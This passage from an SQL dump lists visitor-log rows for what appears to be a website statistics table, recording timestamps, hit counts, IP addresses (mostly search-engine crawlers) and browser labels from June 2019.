,0,0,'207.46.13.62','other'),(425078,1559539997,1,1,0,0,'185.220.101.35','other'),(425079,1559540648,2,2,0,0,'91.196.178.74','chrome'),(425080,1559540777,1,1,0,0,'178.140.52.201','msie'),(425081,1559541004,2,2,0,0,'8.29.198.27','other'),(425082,1559541114,1,1,0,0,'40.77.167.1','other'),(425083,1559541212,1,1,0,0,'207.46.13.68','other'),(425084,1559541994,1,1,0,0,'95.132.8.1','firefox'),(425085,1559541996,1,1,0,0,'66.249.66.222','chrome'),(425086,1559542333,1,1,0,0,'91.209.11.236','other'),(425087,1559542371,1,1,0,0,'66.249.66.218','chrome'),(425088,1559542647,1,1,0,0,'207.46.13.62','other'),(425089,1559542724,1,1,0,0,'178.255.215.94','other'),(425090,1559542770,1,1,0,0,'95.108.213.4','other'),(425091,1559542906,1,1,0,0,'5.45.207.19','other'),(425092,1559543134,1,1,0,0,'141.8.142.108','other'),(425093,1559543830,1,1,0,0,'87.250.224.47','other'),(425094,1559543851,1,1,0,0,'157.55.39.161','other'),(425095,1559545019,2,2,0,0,'31.184.238.251','chrome'),(425096,1559545951,1,1,0,0,'207.46.13.62','other'),(425097,1559546662,1,1,0,0,'5.45.207.19','other'),(425098,1559546729,1,1,0,0,'141.8.142.81','other'),(425099,1559546732,1,1,0,0,'141.8.183.11','other'),(425100,1559546960,1,1,0,0,'60.191.38.77','firefox'),(425101,1559547712,1,1,0,0,'207.46.13.62','other'),(425102,1559548168,1,1,0,0,'40.77.167.66','other'),(425103,1559548752,1,1,0,0,'157.55.39.135','other'),(425104,1559548991,1,1,0,0,'3.95.251.21','chrome'),(425105,1559549085,1,1,0,0,'149.202.222.94','firefox'),(425106,1559549311,1,1,0,0,'141.8.142.108','other'),(425107,1559549446,1,1,0,0,'195.10.210.70','chrome'),(425108,1559549855,1,1,0,0,'94.180.130.67','chrome'),(425109,1559550106,2,2,0,0,'207.46.13.62','other'),(425110,1559550397,1,1,0,0,'95.108.213.4','other'),(425111,1559550415,1,1,0,0,'37.9.113.148','other'),(425112,1559550459,2,2,0,0,'5.45.207.19','other'),(425113,1559550490,1,1,0,0,'40.77.167.18','other'),(425114,1559550507,1,1,0,0,'178.154.244.65','other'),(425115,1559550512,1,1,0,0,'178.154.244.11','other'),(425116,1559550562,1,1,0,0,'60.191.38.77','firefox'),(425117,1559551841,2,2,0,0,'8.29.198.26','other'),(425118,1559552492,1,1,0,0,'213.108.47.30','chrome'),(425119,1559552960,1,1,0,0,'91.196.178.134','firefox'),(425120,1559553178,1,1,0,0,'66.249.66.128','chrome'),(425121,1559553314,1,1,0,0,'91.209.11.236','other'),(425122,1559553477,2,2,0,0,'213.108.47.30','chrome'),(425123,1559553698,1,1,0,0,'178.154.244.11','other'),(425124,1559553830,1,1,0,0,'37.9.113.148','other'),(425125,1559554064,1,1,0,0,'91.196.178.134','firefox'),(425126,1559555251,1,1,0,0,'40.77.167.66','other'),(425127,1559555296,1,1,0,0,'157.55.39.135','other'),(425128,1559555788,1,1,0,0,'91.209.11.236','other'),(425129,1559556203,1,1,0,0,'66.249.66.130','chrome'),(425130,1559556365,1,1,0,0,'40.77.167.66','other'),(425131,1559556575,1,1,0,0,'78.111.186.127','chrome'),(425132,1559556763,1,1,0,0,'157.55.39.80','other'),(425133,1559556902,1,1,0,0,'91.209.11.236','other'),(425134,1559557020,1,1,0,0,'66.249.66.218','chrome'),(425135,1559557024,1,1,0,0,'109.74.154.72','chrome'),(425136,1559557323,1,1,0,0,'5.45.207.19','other'),(425137,1559557445,1,1,0,0,'207.46.13.253','other'),(425138,1559557832,1,1,0,0,'157.55.39.80','other'),(425139,1559558214,1,1,0,0,'66.249.66.222','chrome'),(425140,1559558613,1,1,0,0,'157.55.39.135','other'),(425141,1559559263,1,1,0,0,'95.108.213.4','other'),(425142,1559559884,1,1,0,0,'40.77.167.221','other'),(425143,1559559936,1,1,0,0,'37.9.113.38','other'),(425144,1559559973,3,3,0,0,'35.194.15.0','chrome'),(425145,1559559998,3,3,0,0,'35.184.130.169','chrome'),(425146,1559560017,3,3,0,0,'35.238.184.30','chrome'),(425147,1559560392,1,1,0,0,'46.166.186.210','other'),(425148,1559560985,1,1,0,0,'178.154.171.17','other'),(425149,1559561228,1,1,0,0,'91.227.206.120','chrome'),(425150,1559561378,1,1,0,0,'37.52.205.53','firefox'),(425151,1559561478,1,1,0,0,'91.196.178.78','chrome'),(425152,1559561490,1,1,0,0,'157.55.39.122','other'),(425153,1559562125,1,1,0,0,'213.160.137.114','chrome'),(425154,1559562434,1,1,0,0,'91.227.206.120','chrome'),(425155,1559562446,1,1,0,0,'66.249.66.218','chrome'),(425156,1559562464,1,1,0,0,'207.46.13.15','other'),(425157,1559562475,2,2,0,0,'91.209.11.236','other'),(425158,1559562685,2,2,0,0,'8.29.198.25','other'),(425159,1559562854,1,1,0,0,'95.108.213.50','other'),(425160,1559562857,1,1,0,0,'213.180.203.9','other'),(425161,1559563200,1,1,0,0,'66.249.66.220','chrome'),(425162,1559564067,1,1,0,0,'157.55.39.146','other'),(425163,1559564153,1,1,0,0,'40.77.167.33','other'),(425164,1559564438,1,1,0,0,'207.46.13.50','other'),(425165,1559564583,1,1,0,0,'66.249.66.218','chrome'),(425166,1559564600,1,1,0,0,'66.249.66.220','chrome'),(425167,1559564710,1,1,0,0,'40.77.167.18','other'),(425168,1559565109,1,1,0,0,'5.255.253.22','other'),(425169,1559565301,1,1,0,0,'66.249.66.128','chrome'),(425170,1559565637,1,1,0,0,'91.196.178.88','firefox'),(425171,1559565841,1,1,0,0,'91.196.177.46','chrome'),(425172,1559566667,1,1,0,0,'66.249.66.222','chrome'),(425173,1559567039,1,1,0,0,'157.55.39.146','other'),(425174,1559567745,1,1,0,0,'40.77.167.18','other'),(425175,1559567793,1,1,0,0,'87.250.224.107','other'),(425176,1559567833,1,1,0,0,'95.108.181.57','other'),(425177,1559567875,1,1,0,0,'91.196.177.46','chrome'),(425178,1559568346,1,1,0,0,'157.55.39.157','other'),(425179,1559568497,1,1,0,0,'66.249.66.130','chrome'),(425180,1559569006,1,1,0,0,'157.55.39.146','other'),(425181,1559570163,1,1,0,0,'95.108.213.50','other'),(425182,1559570372,1,1,0,0,'40.77.167.18','other'),(425183,1559571286,3,3,0,0,'207.46.13.67','other'),(425184,1559571347,3,3,0,0,'157.55.39.157','other'),(425185,1559571577,2,2,0,0,'207.46.13.50','other'),(425186,1559571791,1,1,0,0,'66.249.66.218','chrome'),(425187,1559572489,1,1,0,0,'178.154.171.69','other'),(425188,1559572548,1,1,0,0,'5.45.207.79','other'),(425189,1559572791,1,1,0,0,'157.55.39.157','other'),(425190,1559573200,1,1,0,0,'207.46.13.232','other'),(425191,1559573523,2,2,0,0,'8.29.198.26','other'),(425192,1559575164,1,1,0,0,'207.46.13.67','other'),(425193,1559575169,1,1,0,0,'157.55.39.151','other'),(425194,1559575173,2,2,0,0,'157.55.39.157','other'),(425195,1559575909,1,1,0,0,'207.46.13.50','other'),(425196,1559576664,1,1,0,0,'37.9.113.38','other'),(425197,1559576960,1,1,0,0,'37.52.52.172','chrome'),(425198,1559577428,1,1,0,0,'176.105.170.143','firefox'),(425199,1559578880,1,1,0,0,'95.28.88.131','msie'),(425200,1559579266,1,1,0,0,'207.46.13.67','other'),(425201,1559579271,3,3,0,0,'157.55.39.151','other'),(425202,1559581317,1,1,0,0,'66.249.64.62','chrome'),(425203,1559581575,1,1,0,0,'207.46.13.67','other'),(425204,1559582705,1,1,0,0,'66.249.64.60','chrome'),(425205,1559584140,1,1,0,0,'207.46.13.67','other'),(425206,1559584362,1,1,0,0,'8.29.198.26','other'),(425207,1559584577,1,1,0,0,'66.249.64.58','chrome'),(425208,1559585077,1,1,0,0,'8.29.198.27','other'),(425209,1559585147,1,1,0,0,'178.154.244.21','other'),(425210,1559585693,1,1,0,0,'180.76.15.28','other'),(425211,1559585924,1,1,0,0,'207.46.13.50','other'),(425212,1559586289,1,1,0,0,'141.8.142.103','other'),(425213,1559586562,2,2,0,0,'91.209.11.236','other'),(425214,1559586995,1,1,0,0,'178.154.244.11','other'),(425215,1559587577,1,1,0,0,'87.250.224.107','other'),(425216,1559587711,2,2,0,0,'91.209.11.236','other'),(425217,1559588381,1,1,0,0,'207.46.13.50','other'),(425218,1559588746,1,1,0,0,'188.234.52.139','chrome'),(425219,1559588828,1,1,0,0,'91.209.11.236','other'),(425220,1559589631,1,1,0,0,'40.77.167.46','other'),(425221,1559589944,1,1,0,0,'207.46.13.163','other'),(425222,1559590663,1,1,0,0,'5.45.207.76','other'),(425223,1559590696,1,1,0,0,'66.249.64.58','chrome'),(425224,1559590764,2,2,0,0,'95.213.141.126','opera'),(425225,1559591922,1,1,0,0,'40.77.167.46','other'),(425226,1559591996,1,1,0,0,'87.250.224.47','other'),(425227,1559592468,1,1,0,0,'157.55.39.151','other'),(425228,1559592993,1,1,0,0,'91.196.178.80','chrome'),(425229,1559593347,2,2,0,0,'192.162.237.54','chrome'),(425230,1559593496,1,1,0,0,'66.249.64.60','chrome'),(425231,1559593689,1,1,0,0,'66.249.64.62','chrome'),(425232,1559593954,1,1,0,0,'193.106.30.98','chrome'),(425233,1559594181,1,1,0,0,'157.55.39.151','other'),(425234,1559594872,1,1,0,0,'207.46.13.163','other'),(425235,1559595204,1,1,0,0,'8.29.198.27','other'),(425236,1559595946,1,1,0,0,'8.29.198.26','other'),(425237,1559597278,1,1,0,0,'37.9.113.38','other'),(425238,1559597346,1,1,0,0,'66.249.64.62','chrome'),(425239,1559598520,1,1,0,0,'178.154.244.21','other'),(425240,1559598595,132,132,0,0,'144.76.236.112','other'),(425241,1559598770,1,1,0,0,'207.46.13.137','other'),(425242,1559598830,1,1,0,0,'157.55.39.207','other'),(425243,1559599409,1,1,0,0,'207.46.13.155','other'),(425244,1559599449,1,1,0,0,'87.250.224.47','other'),(425245,1559599499,80,80,0,0,'144.76.236.112','other'),(425246,1559600617,2,2,0,0,'144.76.236.112','other'),(425247,1559600942,1,1,0,0,'141.8.142.191','other'),(425248,1559601030,1,1,0,0,'5.255.253.16','other'),(425249,1559602200,1,1,0,0,'180.76.15.24','other'),(425250,1559602447,2,2,0,0,'207.46.13.137','other'),(425251,1559603120,1,1,0,0,'93.158.166.7','other'),(425252,1559603247,1,1,0,0,'157.55.39.207','other'),(425253,1559603405,96,96,0,0,'204.12.197.234','other'),(425254,1559603541,150,150,0,0,'5.9.144.234','other'),(425255,1559603659,1,1,0,0,'5.255.253.25','other'),(425256,1559603838,1,1,0,0,'213.180.203.61','other'),(425257,1559603959,300,300,0,0,'81.110.84.7','other'),(425258,1559604199,1,1,0,0,'180.76.15.25','other'),(425259,1559604672,1,1,0,0,'207.46.13.242','other'),(425260,1559606039,2,2,0,0,'8.29.198.26','other'),(425261,1559606355,1,1,0,0,'40.77.167.110','other'),(425262,1559606681,1,1,0,0,'157.55.39.129','other'),(425263,1559607517,1,1,0,0,'5.255.253.25','other'),(425264,1559607661,1,1,0,0,'66.249.64.60','chrome'),(425265,1559607691,2,2,0,0,'66.249.64.58','chrome'),(425266,1559607855,6,6,0,0,'148.251.70.179','other'),(425267,1559608515,1,1,0,0,'157.55.39.239','other'),(425268,1559610495,1,1,0,0,'66.249.64.58','chrome'),(425269,1559611205,1,1,0,0,'40.77.167.222','other'),(425270,1559611792,1,1,0,0,'66.249.64.58','chrome'),(425271,1559612815,1,1,0,0,'40.77.167.222','other'),(425272,1559613944,2,2,0,0,'157.55.39.243','other'),(425273,1559614310,1,1,0,0,'141.8.183.11','other'),(425274,1559614618,1,1,0,0,'178.154.244.49','other'),(425275,1559614946,1,1,0,0,'207.46.13.230','other'),(425276,1559615264,1,1,0,0,'157.55.39.239','other'),(425277,1559615958,2,2,0,0,'66.249.64.62','chrome'),(425278,1559616739,1,1,0,0,'207.46.13.51','other'),(425279,1559616812,1,1,0,0,'157.55.39.249','other'),(425280,1559616868,1,1,0,0,'8.29.198.27','other'),(425281,1559617189,23,23,0,0,'5.9.156.20','other'),(425282,1559617226,1,1,0,0,'157.55.39.243','other'),(425283,1559617627,1,1,0,0,'8.29.198.25','other'),(425284,1559617764,1,1,0,0,'66.249.64.58','chrome'),(425285,1559618008,1,1,0,0,'13.66.139.0','other'),(425286,1559618729,1,1,0,0,'66.249.64.60','chrome'),(425287,1559618883,1,1,0,0,'157.55.39.249','other'),(425288,1559620261,1,1,0,0,'207.46.13.51','other'),(425289,1559620845,1,1,0,0,'66.249.64.60','chrome'),(425290,1559621003,1,1,0,0,'66.249.64.62','chrome'),(425291,1559621126,1,1,0,0,'157.55.39.249','other'),(425292,1559621424,1,1,0,0,'5.255.253.25','other'),(425293,1559621600,1,1,0,0,'66.249.64.58','chrome'),(425294,1559621917,1,1,0,0,'178.154.244.21','other'),(425295,1559621963,2,2,0,0,'87.250.224.47','other'),(425296,1559622260,1,1,0,0,'213.180.203.23','other'),(425297,1559623922,1,1,0,0,'157.55.39.249','other'),(425298,1559625311,1,1,0,0,'66.249.64.58','chrome'),(425299,1559625359,1,1,0,0,'213.180.203.23','other'),(425300,1559625430,1,1,0,0,'87.250.224.99','other'),(425301,1559625439,1,1,0,0,'141.8.142.162','other'),(425302,1559625467,1,1,0,0,'5.45.207.76','other'),(425303,1559626995,1,1,0,0,'66.249.64.60','chrome'),(425304,1559627705,1,1,0,0,'8.29.198.25','other'),(425305,1559628461,1,1,0,0,'8.29.198.26','other'),(425306,1559628769,1,1,0,0,'91.196.178.78','chrome'),(425307,1559628794,1,1,0,0,'13.66.139.0','other'),(425308,1559628828,1,1,0,0,'91.196.178.98','chrome'),(425309,1559629482,1,1,0,0,'157.55.39.249','other'),(425310,1559629502,2,2,0,0,'66.249.64.60','chrome'),(425311,1559629880,1,1,0,0,'91.196.178.74','chrome'),(425312,1559629966,1,1,0,0,'95.108.181.94','other'),(425313,1559630019,2,2,0,0,'91.209.11.236','other'),(425314,1559630020,1,1,0,0,'178.154.171.69','other'),(425315,1559630055,1,1,0,0,'66.249.64.58','chrome'),(425316,1559630819,1,1,0,0,'157.55.39.249','other'),(425317,1559630911,1,1,0,0,'51.15.53.83','other'),(425318,1559630927,2,2,0,0,'91.209.11.236','other'),(425319,1559631438,2,2,0,0,'198.16.66.196','firefox'),(425320,1559631471,1,1,0,0,'66.249.64.60','chrome'),(425321,1559632041,1,1,0,0,'40.77.167.99','other'),(425322,1559632052,1,1,0,0,'91.209.11.236','other'),(425323,1559632081,1,1,0,0,'109.201.154.214','other'),(425324,1559632203,1,1,0,0,'207.46.13.125','other'),(425325,1559632632,8,8,0,0,'157.55.39.249','other'),(425326,1559632648,2,2,0,0,'144.168.162.250','chrome'),(425327,1559632896,1,1,0,0,'66.249.64.58','chrome'),(425328,1559633212,4,4,0,0,'207.46.13.125','other'),(425329,1559633317,4,4,0,0,'40.77.167.99','other'),(425330,1559633322,2,2,0,0,'40.77.167.11','other'),(425331,1559633746,2,2,0,0,'157.55.39.249','other'),(425332,1559634211,1,1,0,0,'178.154.171.69','other'),(425333,1559634557,1,1,0,0,'40.77.167.99','other'),(425334,1559634727,1,1,0,0,'87.250.224.99','other'),(425335,1559634768,1,1,0,0,'91.209.11.236','other'),(425336,1559635104,1,1,0,0,'66.249.64.60','chrome'),(425337,1559635115,2,2,0,0,'66.249.64.58','chrome'),(425338,1559635331,1,1,0,0,'66.249.64.62','chrome'),(425339,1559636272,1,1,0,0,'31.13.115.4','chrome'),(425340,1559636846,1,1,0,0,'60.191.38.77','firefox'),(425341,1559637465,1,1,0,0,'213.108.44.30','chrome'),(425342,1559637699,1,1,0,0,'91.196.178.167','chrome'),(425343,1559637890,1,1,0,0,'213.108.45.138','chrome'),(425344,1559638544,1,1,0,0,'8.29.198.26','other'),(425345,1559638871,1,1,0,0,'91.196.178.98','chrome'),(425346,1559638906,1,1,0,0,'91.196.177.15','chrome'),(425347,1559639087,1,1,0,0,'40.77.167.11','other'),(425348,1559639203,3,3,0,0,'66.249.64.62','chrome'),(425349,1559639316,1,1,0,0,'8.29.198.25','other'),(425350,1559639790,1,1,0,0,'178.154.244.65','other'),(425351,1559639794,1,1,0,0,'207.46.13.81','other'),(425352,1559639872,1,1,0,0,'5.45.207.76','other'),(425353,1559639904,1,1,0,0,'46.219.61.42','chrome'),(425354,1559639959,1,1,0,0,'141.8.183.11','other'),(425355,1559640847,1,1,0,0,'66.249.64.62','chrome'),(425356,1559641785,2,2,0,0,'66.249.64.60','chrome'),(425357,1559642247,2,2,0,0,'207.46.13.95','other'),(425358,1559642548,1,1,0,0,'40.77.167.11','other'),(425359,1559642888,1,1,0,0,'66.249.64.58','chrome'),(425360,1559643014,1,1,0,0,'109.74.154.72','chrome'),(425361,1559643177,2,2,0,0,'66.249.64.62','chrome'),(425362,1559644639,1,1,0,0,'207.46.13.95','other'),(425363,1559644967,3,3,0,0,'66.249.64.60','chrome'),(425364,1559645018,3,3,0,0,'66.249.64.58','chrome'),(425365,1559645160,1,1,0,0,'66.249.64.62','chrome'),(425366,1559646167,1,1,0,0,'66.249.64.58','chrome'),(425367,1559646277,3,3,0,0,'35.225.123.241','chrome'),(425368,1559646311,3,3,0,0,'35.238.57.105','chrome'),(425369,1559646323,2,2,0,0,'104.197.107.57','chrome'),(425371,1559646336,3,3,0,0,'35.192.1.203','chrome'),(425372,1559646353,3,3,0,0,'35.222.73.58','chrome'),(425373,1559646366,3,3,0,0,'35.193.15.109','chrome'),(425374,1559646457,1,1,0,0,'40.77.167.162','other'),(425375,1559646807,1,1,0,0,'87.250.224.107','other'),(425376,1559646858,1,1,0,0,'141.8.183.11','other'),(425377,1559646974,1,1,0,0,'194.60.255.246','chrome'),(425378,1559647076,1,1,0,0,'91.196.178.177','chrome'),(425379,1559647597,2,2,0,0,'66.249.64.62','chrome'),(425380,1559647980,1,1,0,0,'178.154.171.30','other'),(425381,1559648160,1,1,0,0,'66.249.64.58','chrome'),(425382,1559648235,1,1,0,0,'87.250.224.99','other'),(425383,1559648311,1,1,0,0,'207.46.13.95','other'),(425384,1559648467,2,2,0,0,'207.46.13.121','other'),(425385,1559648647,1,1,0,0,'66.249.64.62','chrome'),(425386,1559649065,1,1,0,0,'40.77.167.90','other'),(425387,1559649084,1,1,0,0,'13.66.139.0','other'),(425388,1559649279,1,1,0,0,'207.46.13.95','other'),(425389,1559649380,2,2,0,0,'8.29.198.27','other'),(425390,1559649915,2,2,0,0,'66.249.64.60','chrome'),(425391,1559650024,2,2,0,0,'66.249.64.58','chrome'),(425392,1559650500,1,1,0,0,'95.108.181.94','other'),(425393,1559650597,1,1,0,0,'178.154.244.65','other'),(425394,1559650601,1,1,0,0,'87.250.224.107','other'),(425395,1559650604,1,1,0,0,'141.8.142.144','other'),(425396,1559650607,1,1,0,0,'141.8.142.65','other'),(425397,1559650649,1,1,0,0,'178.154.171.69','other'),(425398,1559650989,2,2,0,0,'66.249.64.60','chrome'),(425399,1559651154,1,1,0,0,'40.77.167.162','other'),(425400,1559651298,1,1,0,0,'66.249.64.58','chrome'),(425401,1559651928,1,1,0,0,'91.196.178.132','chrome'),(425402,1559652354,1,1,0,0,'91.206.111.142','chrome'),(425403,1559652439,1,1,0,0,'94.179.29.28','chrome'),(425404,1559652667,1,1,0,0,'66.249.64.58','chrome'),(425405,1559652866,1,1,0,0,'66.249.64.62','chrome'),(425406,1559653002,1,1,0,0,'66.249.64.60','chrome'),(425407,1559653060,1,1,0,0,'91.196.178.78','chrome'),(425408,1559654037,1,1,0,0,'141.8.142.65','other'),(425409,1559655755,1,1,0,0,'66.249.64.62','chrome'),(425410,1559655802,1,1,0,0,'178.154.171.17','other'),(425411,1559655957,1,1,0,0,'66.249.64.58','chrome'),(425412,1559656151,2,2,0,0,'40.77.167.90','other'),(425413,1559656189,1,1,0,0,'157.55.39.106','other'),(425414,1559656603,1,1,0,0,'87.250.224.47','other'),(425415,1559657480,1,1,0,0,'207.46.13.95','other'),(425416,1559657487,2,2,0,0,'40.77.167.90','other'),(425417,1559657490,2,2,0,0,'207.46.13.121','other'),(425418,1559658288,1,1,0,0,'87.250.224.99','other'),(425419,1559658553,1,1,0,0,'157.55.39.106','other'),(425420,1559658691,1,1,0,0,'5.255.253.22','other'),(425421,1559658749,1,1,0,0,'178.154.171.17','other'),(425422,1559659869,1,1,0,0,'178.154.171.17','other'),(425423,1559660215,1,1,0,0,'8.29.198.27','other'),(425424,1559660220,1,1,0,0,'37.204.206.150','msie'),(425425,1559660786,1,1,0,0,'91.196.178.48','chrome'),(425426,1559661017,1,1,0,0,'8.29.198.26','other'),(425427,1559661716,1,1,0,0,'66.249.64.60','chrome'),(425428,1559662466,1,1,0,0,'5.45.207.19','other'),(425429,1559662805,1,1,0,0,'207.46.13.220','other'),(425430,1559662858,1,1,0,0,'176.122.90.30','chrome'),(425431,1559663615,1,1,0,0,'157.55.39.106','other'),(425432,1559664784,1,1,0,0,'157.55.39.106','other'),(425433,1559665019,1,1,0,0,'207.46.13.159','other'),(425434,1559665675,1,1,0,0,'91.196.178.48','chrome'),(425435,1559665803,1,1,0,0,'157.55.39.106','other'),(425436,1559666041,1,1,0,0,'178.154.244.49','other'),(425437,1559666157,1,1,0,0,'141.8.142.81','other'),(425438,1559666259,1,1,0,0,'5.45.207.19','other'),(425439,1559667191,1,1,0,0,'66.249.64.58','chrome'),(425440,1559667198,1,1,0,0,'91.196.178.48','chrome'),(425441,1559667702,1,1,0,0,'91.225.165.252','chrome'),(425442,1559668106,2,2,0,0,'207.46.13.51','other'),(425443,1559668418,1,1,0,0,'209.17.97.50','other'),(425444,1559669361,1,1,0,0,'66.249.64.60','chrome'),(425445,1559670700,1,1,0,0,'5.58.53.161','opera'),(425446,1559671046,1,1,0,0,'8.29.198.27','other'),(425447,1559671523,1,1,0,0,'207.46.13.52','other'),(425448,1559671865,1,1,0,0,'8.29.198.25','other'),(425449,1559672081,1,1,0,0,'157.55.39.132','other'),(425450,1559672517,1,1,0,0,'13.66.139.0','other'),(425451,1559672710,1,1,0,0,'207.46.13.52','other'),(425452,1559673170,1,1,0,0,'46.211.2.20','chrome'),(425453,1559673758,2,2,0,0,'40.77.167.50','other'),(425454,1559674288,1,1,0,0,'66.249.64.62','chrome'),(425455,1559674572,2,2,0,0,'157.55.39.132','other'),(425456,1559674919,1,1,0,0,'180.76.15.140','other'),(425457,1559676194,1,1,0,0,'157.55.39.132','other'),(425458,1559676705,1,1,0,0,'40.77.167.163','other'),(425459,1559676919,1,1,0,0,'180.76.15.25','other'),(425460,1559677949,1,1,0,0,'207.46.13.49','other'),(425461,1559678239,1,1,0,0,'13.66.139.0','other'),(425462,1559679681,1,1,0,0,'178.154.244.11','other'),(425463,1559679808,2,2,0,0,'157.55.39.91','other'),(425464,1559680401,1,1,0,0,'176.117.162.212','chrome'),(425465,1559680753,1,1,0,0,'207.46.13.125','other'),(425466,1559681497,1,1,0,0,'87.250.224.47','other'),(425467,1559681893,2,2,0,0,'8.29.198.27','other'),(425468,1559682306,1,1,0,0,'66.102.9.62','chrome'),(425469,1559682630,1,1,0,0,'66.249.64.60','chrome'),(425470,1559682662,1,1,0,0,'176.9.9.94','other'),(425471,1559683392,1,1,0,0,'37.9.113.148','other'),(425472,1559683396,1,1,0,0,'87.250.224.47','other'),(425473,1559683881,1,1,0,0,'87.250.224.64','other'),(425474,1559684868,1,1,0,0,'207.46.13.12','other'),(425475,1559685206,1,1,0,0,'5.45.207.19','other'),(425476,1559685362,1,1,0,0,'5.45.207.79','other'),(425477,1559688276,1,1,0,0,'141.8.142.103','other'),(425478,1559688328,1,1,0,0,'40.77.167.11','other'),(425479,1559690101,1,1,0,0,'66.249.64.60','chrome'),(425480,1559691603,3,3,0,0,'176.9.9.94','other'),(425481,1559692733,1,1,0,0,'8.29.198.27','other'),(425482,1559693547,1,1,0,0,'8.29.198.26','other'),(425483,1559694251,1,1,0,0,'66.249.64.58','chrome'),(425484,1559695036,1,1,0,0,'207.46.13.51','other'),(425485,1559695686,1,1,0,0,'40.77.167.80','other'),(425486,1559696439,1,1,0,0,'66.249.64.60','chrome'),(425487,1559696655,1,1,0,0,'66.249.64.58','chrome'),(425488,1559697283,1,1,0,0,'66.249.64.62','chrome'),(425489,1559697560,1,1,0,0,'207.46.13.51','other'),(425490,1559698724,1,1,0,0,'13.66.139.0','other'),(425491,1559699420,1,1,0,0,'66.249.64.60','chrome'),(425492,1559700821,8,8,0,0,'176.9.9.94','other'),(425493,1559701324,1,1,0,0,'66.249.64.58','chrome'),(425494,1559701723,2,2,0,0,'176.9.9.94','other'),(425495,1559701966,1,1,0,0,'207.46.13.51','other'),(425496,1559703576,2,2,0,0,'8.29.198.27','other'),(425497,1559703716,1,1,0,0,'66.249.64.62','chrome'),(425498,1559703814,1,1,0,0,'207.46.13.51','other'),(425499,1559704315,1,1,0,0,'195.128.17.206','other'),(425500,1559704479,1,1,0,0,'178.154.171.17','other'),(425501,1559706870,1,1,0,0,'5.45.207.76','other'),(425502,1559707133,2,2,0,0,'40.77.167.197','other'),(425503,1559709549,1,1,0,0,'66.249.64.58','chrome'),(425504,1559709718,1,1,0,0,'66.249.64.62','chrome'),(425505,1559710291,2,2,0,0,'157.55.39.52','other'),(425506,1559710301,1,1,0,0,'157.55.39.77','other'),(425507,1559710410,9,9,0,0,'176.9.9.94','other'),(425508,1559711316,4,4,0,0,'176.9.9.94','other'),(425509,1559711606,2,2,0,0,'207.46.13.219','other'),(425510,1559711624,1,1,0,0,'213.180.203.53','other'),(425511,1559712440,1,1,0,0,'80.127.116.96','other'),(425512,1559712856,1,1,0,0,'209.17.96.194','other'),(425513,1559713030,1,1,0,0,'91.196.178.136','chrome'),(425514,1559714156,1,1,0,0,'91.196.178.136','chrome'),(425515,1559714414,1,1,0,0,'8.29.198.26','other'),(425516,1559714769,2,2,0,0,'66.249.64.60','chrome'),(425517,1559715232,1,1,0,0,'8.29.198.27','other'),(425518,1559715422,1,1,0,0,'207.46.13.219','other'),(425519,1559716994,1,1,0,0,'207.46.13.219','other'),(425520,1559717653,1,1,0,0,'207.46.13.95','other'),(425521,1559718594,1,1,0,0,'207.46.13.95','other'),(425522,1559719386,3,3,0,0,'176.9.9.94','other'),(425523,1559720085,1,1,0,0,'37.53.90.175','chrome'),(425524,1559720367,1,1,0,0,'178.154.171.69','other'),(425525,1559720485,1,1,0,0,'5.255.253.16','other'),(425526,1559721397,1,1,0,0,'157.55.39.244','other'),(425527,1559721505,1,1,0,0,'66.249.64.58','chrome'),(425528,1559722057,1,1,0,0,'46.211.134.16','chrome'),(425529,1559722258,1,1,0,0,'207.46.13.70','other'),(425530,1559723339,1,1,0,0,'66.249.64.58','chrome'),(425531,1559723830,1,1,0,0,'94.179.147.128','chrome'),(425532,1559723974,1,1,0,0,'141.8.142.162','other'),(425533,1559724414,1,1,0,0,'66.249.64.58','chrome'),(425534,1559724930,1,1,0,0,'66.249.64.60','chrome'),(425535,1559725077,2,2,0,0,'157.55.39.228','other'),(425536,1559725256,2,2,0,0,'8.29.198.27','other'),(425537,1559725635,1,1,0,0,'66.249.64.58','chrome'),(425538,1559726070,1,1,0,0,'157.55.39.228','other'),(425539,1559726627,1,1,0,0,'212.90.184.126','chrome'),(425540,1559726926,1,1,0,0,'66.249.66.222','chrome'),(425541,1559727299,1,1,0,0,'66.249.66.218','chrome'),(425542,1559727355,3,3,0,0,'207.46.13.94','other'),(425543,1559727372,1,1,0,0,'66.249.66.130','chrome'),(425544,1559727902,1,1,0,0,'178.154.244.65','other'),(425545,1559728023,1,1,0,0,'141.8.132.16','other'),(425546,1559728035,2,2,0,0,'207.46.13.139','other'),(425547,1559728038,1,1,0,0,'91.196.178.189','chrome'),(425548,1559728041,1,1,0,0,'157.55.39.244','other'),(425549,1559728054,2,2,0,0,'207.46.13.70','other'),(425550,1559728152,1,1,0,0,'37.9.113.148','other'),(425551,1559729337,1,1,0,0,'109.74.154.72','chrome'),(425552,1559730083,1,1,0,0,'207.46.13.94','other'),(425553,1559730775,1,1,0,0,'207.46.13.70','other'),(425554,1559731026,2,2,0,0,'95.213.141.126','opera'),(425555,1559731137,1,1,0,0,'66.249.66.220','chrome'),(425556,1559731275,1,1,0,0,'66.249.66.218','chrome'),(425557,1559731828,1,1,0,0,'213.180.203.61','other'),(425558,1559731832,1,1,0,0,'37.9.113.38','other'),(425559,1559731963,1,1,0,0,'66.249.66.136','chrome'),(425560,1559732059,1,1,0,0,'213.180.203.53','other'),(425561,1559732735,1,1,0,0,'78.111.190.45','chrome'),(425562,1559732825,3,3,0,0,'104.197.84.66','chrome'),(425563,1559732876,3,3,0,0,'35.188.19.18','chrome'),(425564,1559732899,1,1,0,0,'130.211.223.61','chrome'),(425565,1559732900,2,2,0,0,'130.211.223.61','chrome'),(425566,1559733462,1,1,0,0,'66.249.66.68','chrome'),(425567,1559733771,1,1,0,0,'66.249.66.134','chrome'),(425568,1559734578,1,1,0,0,'157.55.39.244','other'),(425569,1559734589,2,2,0,0,'212.26.140.63','firefox'),(425570,1559734804,1,1,0,0,'212.26.140.60','firefox'),(425571,1559734991,1,1,0,0,'212.26.140.58','firefox'),(425572,1559735498,1,1,0,0,'212.26.140.61','firefox'),(425573,1559735720,1,1,0,0,'46.211.102.51','chrome'),(425574,1559736102,2,2,0,0,'8.29.198.25','other'),(425575,1559736159,1,1,0,0,'212.26.140.58','firefox'),(425576,1559736418,1,1,0,0,'212.26.140.60','firefox'),(425577,1559736624,1,1,0,0,'46.211.113.204','other'),(425578,1559736643,1,1,0,0,'5.255.253.22','other'),(425579,1559736849,1,1,0,0,'5.45.207.76','other'),(425580,1559737549,1,1,0,0,'66.249.66.222','chrome'),(425581,1559737581,1,1,0,0,'66.249.66.68','chrome'),(425582,1559737938,1,1,0,0,'66.249.66.134','chrome'),(425583